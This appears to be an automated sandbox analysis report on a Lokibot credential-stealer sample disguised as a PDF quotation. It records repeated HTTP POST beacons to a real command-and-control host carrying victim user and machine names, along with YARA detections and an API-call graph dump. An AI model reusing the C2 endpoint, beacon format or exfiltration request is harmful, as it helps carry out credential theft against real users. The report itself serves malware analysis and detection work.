              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              5 | 192.168.2.3 | 49747 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:46.652462959 CET | 1111 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:46.776705980 CET | 1112 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:46.909101009 CET | 1112 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:45 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              50 | 192.168.2.3 | 49861 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:28.746130943 CET | 10350 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:28.882826090 CET | 10351 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:29.017143965 CET | 10351 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              51 | 192.168.2.3 | 49862 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:30.197088957 CET | 10352 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:30.321491957 CET | 10352 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:30.453828096 CET | 10352 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:29 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              52 | 192.168.2.3 | 49863 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:31.498490095 CET | 10353 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:31.621882915 CET | 10353 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:31.754610062 CET | 10354 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:30 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              53 | 192.168.2.3 | 49864 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:32.828735113 CET | 10355 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:32.953716993 CET | 10355 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:33.107048988 CET | 10355 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:32 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              54 | 192.168.2.3 | 49865 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:34.246263981 CET | 10356 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:34.371715069 CET | 10356 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:34.502947092 CET | 10357 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              55 | 192.168.2.3 | 49866 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:35.583282948 CET | 10357 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:35.705868959 CET | 10358 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:35.838768005 CET | 10358 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:34 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              6 | 192.168.2.3 | 49748 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:48.938221931 CET | 1113 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:49.060915947 CET | 1113 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:49.243886948 CET | 1113 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:48 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              7 | 192.168.2.3 | 49749 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:50.316401958 CET | 1114 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:50.509278059 CET | 1115 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:50.639916897 CET | 1115 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              8 | 192.168.2.3 | 49750 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:51.814681053 CET | 1116 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:51.939326048 CET | 1116 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:52.091804981 CET | 1116 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:51 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              9 | 192.168.2.3 | 49751 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:53.249068975 CET | 1117 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:53.402760029 CET | 1117 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:53.547552109 CET | 1118 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:52 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Code Manipulations

              System Behavior

              General

              Start time: 09:52:29
              Start date: 14/01/2022
              Path: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase: 0x400000
              File size: 250601 bytes
              MD5 hash: 23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation: low

              General

              Start time: 09:52:31
              Start date: 14/01/2022
              Path: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase: 0x400000
              File size: 250601 bytes
              MD5 hash: 23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Disassembly

              Code Analysis

                Execution Graph

                Execution Coverage:11.9%
                Dynamic/Decrypted Code Coverage:6.1%
                Signature Coverage:22.2%
                Total number of Nodes:1336
                Total number of Limit Nodes:25

                Graph

3812->3657 3813->3812 3815 401389 2 API calls 3814->3815 3816 401420 3815->3816 3816->3623 3817->3676 3818->3678 3820 4055cc 3819->3820 3821 4055d1 CharPrevA 3820->3821 3822 402cc7 3820->3822 3821->3820 3821->3822 3823 405a85 lstrcpynA 3822->3823 3823->3682 3824->3692 3825->3700 3827 4038ab 3826->3827 3844 4059e3 wsprintfA 3827->3844 3829 40391c 3830 405aa7 18 API calls 3829->3830 3831 403928 SetWindowTextA 3830->3831 3832 403944 3831->3832 3833 40365e 3831->3833 3832->3833 3834 405aa7 18 API calls 3832->3834 3833->3717 3834->3832 3835->3713 3836->3719 3845 403e83 3837->3845 3839 404f18 3843 404f3f 3839->3843 3848 401389 3839->3848 3840 403e83 SendMessageA 3841 404f51 OleUninitialize 3840->3841 3841->3751 3843->3840 3844->3829 3846 403e9b 3845->3846 3847 403e8c SendMessageA 3845->3847 3846->3839 3847->3846 3850 401390 3848->3850 3849 4013fe 3849->3839 3850->3849 3851 4013cb MulDiv SendMessageA 3850->3851 3851->3850 3852->3762 3854 405659 18 API calls 3853->3854 3855 4053be 3854->3855 3856 4053c7 DeleteFileA 3855->3856 3857 4053de 3855->3857 3858 403416 OleUninitialize 3856->3858 3859 40551d 3857->3859 3894 405a85 lstrcpynA 3857->3894 3858->3621 3858->3622 3859->3858 3865 405d7c 2 API calls 3859->3865 3861 405408 3862 405419 3861->3862 3863 40540c lstrcatA 3861->3863 3864 4055bf 2 API calls 3862->3864 3866 40541f 3863->3866 3864->3866 3868 405538 3865->3868 3867 40542d lstrcatA 3866->3867 3869 405438 lstrlenA FindFirstFileA 3866->3869 3867->3869 3868->3858 3871 405578 3 API calls 3868->3871 3870 405513 3869->3870 3892 40545c 3869->3892 3870->3859 3873 405542 3871->3873 3872 4055a3 CharNextA 3872->3892 3874 40573d 2 API calls 3873->3874 3875 405548 RemoveDirectoryA 3874->3875 3876 405553 3875->3876 3877 40556a 3875->3877 3876->3858 3879 405559 3876->3879 3880 404e23 25 API calls 3877->3880 3882 404e23 25 API calls 3879->3882 3880->3858 3881 4054f2 FindNextFileA 3883 40550a FindClose 3881->3883 3881->3892 3884 405561 3882->3884 3883->3870 3885 4057d3 38 API calls 
3884->3885 3888 405568 3885->3888 3886 40573d 2 API calls 3889 4054bf DeleteFileA 3886->3889 3887 4053aa 59 API calls 3887->3892 3888->3858 3889->3892 3890 404e23 25 API calls 3890->3881 3891 404e23 25 API calls 3891->3892 3892->3872 3892->3881 3892->3886 3892->3887 3892->3890 3892->3891 3893 4057d3 38 API calls 3892->3893 3895 405a85 lstrcpynA 3892->3895 3893->3892 3894->3861 3895->3892 3896->3792 3897->3798 3899 405707 lstrlenA 3898->3899 3900 405711 3899->3900 3901 4056e5 lstrcmpiA 3899->3901 3900->3805 3900->3806 3901->3900 3902 4056fe CharNextA 3901->3902 3902->3899 3903->3809 4755 401ca5 4756 4029cb 18 API calls 4755->4756 4757 401cb5 SetWindowLongA 4756->4757 4758 40287d 4757->4758 4759 401a26 4760 4029cb 18 API calls 4759->4760 4761 401a2c 4760->4761 4762 4029cb 18 API calls 4761->4762 4763 4019d6 4762->4763 4764 4045aa 4765 4045d6 4764->4765 4766 4045ba 4764->4766 4767 404609 4765->4767 4768 4045dc SHGetPathFromIDListA 4765->4768 4775 40532a GetDlgItemTextA 4766->4775 4770 4045f3 SendMessageA 4768->4770 4771 4045ec 4768->4771 4770->4767 4773 40140b 2 API calls 4771->4773 4772 4045c7 SendMessageA 4772->4765 4773->4770 4775->4772 4776 19eb75 4781 19ea5f GetPEB 4776->4781 4778 19ed2d 4779 19ebda 4779->4778 4782 19f1b5 4779->4782 4781->4779 4796 19ea5f GetPEB 4782->4796 4784 19f20c 4785 19f2f7 4784->4785 4787 19f304 4784->4787 4795 19f2ba 4784->4795 4786 19f4dd 5 API calls 4785->4786 4786->4795 4788 19e5ff 4 API calls 4787->4788 4787->4795 4789 19f40a 4788->4789 4790 19f477 4789->4790 4791 19e5ff 4 API calls 4789->4791 4789->4795 4792 19e5ff 4 API calls 4790->4792 4791->4789 4793 19f496 4792->4793 4794 19e54e 4 API calls 4793->4794 4793->4795 4794->4795 4795->4778 4796->4784 4797 402b2d 4798 402b55 4797->4798 4799 402b3c SetTimer 4797->4799 4800 402ba3 4798->4800 4801 402ba9 MulDiv 4798->4801 4799->4798 4802 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4801->4802 4802->4800 4804 401bad 4805 4029cb 18 API calls 4804->4805 4806 401bb4 4805->4806 4807 4029cb 
18 API calls 4806->4807 4808 401bbe 4807->4808 4809 401bce 4808->4809 4811 4029e8 18 API calls 4808->4811 4810 401bde 4809->4810 4812 4029e8 18 API calls 4809->4812 4813 401be9 4810->4813 4814 401c2d 4810->4814 4811->4809 4812->4810 4815 4029cb 18 API calls 4813->4815 4816 4029e8 18 API calls 4814->4816 4817 401bee 4815->4817 4818 401c32 4816->4818 4819 4029cb 18 API calls 4817->4819 4820 4029e8 18 API calls 4818->4820 4822 401bf7 4819->4822 4821 401c3b FindWindowExA 4820->4821 4825 401c59 4821->4825 4823 401c1d SendMessageA 4822->4823 4824 401bff SendMessageTimeoutA 4822->4824 4823->4825 4824->4825 4826 40422e 4827 404264 4826->4827 4828 40423e 4826->4828 4830 403e9e 8 API calls 4827->4830 4829 403e37 19 API calls 4828->4829 4831 40424b SetDlgItemTextA 4829->4831 4832 404270 4830->4832 4831->4827 4833 402630 4834 4029e8 18 API calls 4833->4834 4835 402637 FindFirstFileA 4834->4835 4836 40265a 4835->4836 4840 40264a 4835->4840 4837 402661 4836->4837 4841 4059e3 wsprintfA 4836->4841 4842 405a85 lstrcpynA 4837->4842 4841->4837 4842->4840 4850 4024b0 4851 4024b5 4850->4851 4852 4024c6 4850->4852 4853 4029cb 18 API calls 4851->4853 4854 4029e8 18 API calls 4852->4854 4855 4024bc 4853->4855 4856 4024cd lstrlenA 4854->4856 4857 4024ec WriteFile 4855->4857 4858 40264e 4855->4858 4856->4855 4857->4858 3451 4015b3 3452 4029e8 18 API calls 3451->3452 3453 4015ba 3452->3453 3469 40560c CharNextA CharNextA 3453->3469 3455 40160a 3456 40160f 3455->3456 3459 40162d 3455->3459 3458 401423 25 API calls 3456->3458 3457 4055a3 CharNextA 3460 4015d0 CreateDirectoryA 3457->3460 3461 401616 3458->3461 3462 401423 25 API calls 3459->3462 3463 4015c2 3460->3463 3464 4015e5 GetLastError 3460->3464 3475 405a85 lstrcpynA 3461->3475 3468 40215b 3462->3468 3463->3455 3463->3457 3464->3463 3466 4015f2 GetFileAttributesA 3464->3466 3466->3463 3467 401621 